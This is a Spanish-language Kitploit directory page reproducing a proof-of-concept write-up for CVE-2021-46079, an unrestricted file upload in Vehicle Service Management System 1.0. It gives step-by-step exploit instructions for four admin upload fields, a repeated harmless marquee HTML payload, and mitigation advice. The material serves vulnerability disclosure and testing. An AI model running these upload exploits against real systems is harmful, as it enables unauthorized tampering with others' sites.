Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Vehicle-Service-Management-System-Multiple-File-upload-Leads-to-Html-Injection — CVE-2021-46079 - Existe una vulnerabilidad de subida de archivos sin restricciones en Sourcecodester Vehicle Service Management System 1.0. Un atacante remoto puede subir archivos maliciosos que provocan Inyección HTML. | Kitploit
Herramientas/GitHubGitHub/sanupl/vehicle-service-management-system-multiple-file-upload-leads-to-html-injection
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebSeguridad WebPruebas de Penetración
GitHubsanupl/vehicle-service-management-system-multiple-file-upload-leads-to-html-injection

Vehicle-Service-Management-System-Multiple-File-upload-Leads-to-Html-Injection

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2021-46079 - Existe una vulnerabilidad de subida de archivos sin restricciones en Sourcecodester Vehicle Service Management System 1.0. Un atacante remoto puede subir archivos maliciosos que provocan Inyección HTML.

Ver Repositorio
hace 3 mesesAún no revisado

CVE-2021-46079

Título del exploit: Vehicle Service Management System: la carga de archivos 'múltiple' conduce a inyección de HTML

Autor del exploit: SANU P.L

CVE: CVE-2021-46079

CVSS: 7.2 ALTA

Referencias:

  • https://www.plsanu.com/vehicle-service-management-system-multiple-file-upload-leads-to-html-injection
  • https://nvd.nist.gov/vuln/detail/CVE-2021-46079
  • https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-46079

Descripción:

Existe una vulnerabilidad de carga de archivos sin restricciones en Sourcecodester Vehicle Service Management System 1.0. Un atacante remoto puede cargar archivos maliciosos que provocan inyección de HTML.

1. Vehicle Service Management System - 'Mi cuenta' (/admin/?page=user)

Exploit:

  1. Inicie sesión en el panel de administración http://localhost/vehicle_service/admin
  2. Vaya a la sección Mi cuenta http://localhost/vehicle_service/admin/?page=user

Payload:

root@kitploit:~
<!DOCTYPE html>
<html>
<head>
<title>HTML marquee Tag</title>
</head>
<body>
<marquee>HTML INJECTION</marquee>
</body>
</html>
  1. Guarde el código html anterior, por ejemplo: Html Injection.html
  2. En la sección Mi cuenta, introduzca todos los datos requeridos y seleccione el archivo html en Avatar.
  3. Haga clic en el botón Actualizar.
  4. Abra la imagen del avatar en una pestaña nueva.
  5. Se ejecuta la inyección de HTML.

2. Vehicle Service Management System - 'Lista de usuarios' (/admin/?page=user/manage_user)

Exploit:

  1. Inicie sesión en el panel de administración http://localhost/vehicle_service/admin
  2. Vaya a la sección Lista de usuarios y haga clic en el botón Crear nuevo.

Payload:

root@kitploit:~
<!DOCTYPE html>
<html>
<head>
<title>HTML marquee Tag</title>
</head>
<body>
<marquee>HTML INJECTION</marquee>
</body>
</html>
  1. Guarde el código html anterior, por ejemplo: Html Injection.html
  2. En la página Crear nuevo usuario, introduzca todos los datos requeridos y seleccione el archivo html en Avatar.
  3. Haga clic en el botón Guardar.
  4. Abra la imagen del avatar en una pestaña nueva.
  5. Se ejecuta la inyección de HTML.

3. Vehicle Service Management System - 'Configuración: logotipo del sistema' (/admin/?page=system_info)

Payload:

  1. Inicie sesión en el panel de administración http://localhost/vehicle_service/admin
  2. Vaya a la sección Configuración http://localhost/vehicle_service/admin/?page=system_info

Payload:

root@kitploit:~
<!DOCTYPE html>
<html>
<head>
<title>HTML marquee Tag</title>
</head>
<body>
<marquee>HTML INJECTION</marquee>
</body>
</html>
  1. Guarde el código html anterior, por ejemplo: Html Injection.html
  2. En la sección Configuración, introduzca todos los datos requeridos y seleccione el archivo html en Logotipo del sistema.
  3. Haga clic en el botón Actualizar.
  4. Abra la imagen del logotipo del sistema en una pestaña nueva.
  5. Se ejecuta la inyección de HTML.

4. Vehicle Service Management System - 'Configuración: portada del sitio web' (/admin/?page=system_info)

Exploit:

  1. Inicie sesión en el panel de administración http://localhost/vehicle_service/admin
  2. Vaya a la sección Configuración http://localhost/vehicle_service/admin/?page=system_info

Payload:

root@kitploit:~
<!DOCTYPE html>
<html>
<head>
<title>HTML marquee Tag</title>
</head>
<body>
<marquee>HTML INJECTION</marquee>
</body>
</html>
  1. Guarde el código html anterior, por ejemplo: Html Injection.html
  2. En la sección Configuración, introduzca todos los datos requeridos y seleccione el archivo html en Portada del sitio web.
  3. Haga clic en el botón Actualizar.
  4. Abra la imagen de la portada del sitio web en una pestaña nueva.
  5. Se ejecuta la inyección de HTML.

Impacto:

Un atacante puede cargar archivos maliciosos en múltiples endpoints, lo que conduce a inyección de HTML.

Mitigación:

Se recomienda implementar lo siguiente:

  • Nunca acepte un nombre de archivo y su extensión directamente sin un filtro de lista blanca.
  • Si no es necesario tener caracteres Unicode, es muy recomendable aceptar solo caracteres alfanuméricos y un único punto como entrada para el nombre de archivo y la extensión.
  • Limite el tamaño del archivo a un valor máximo para prevenir ataques de denegación de servicio.
  • El directorio de carga no debe tener ningún permiso de "ejecución".
  • No confíe únicamente en la validación del lado del cliente.
Descargar herramienta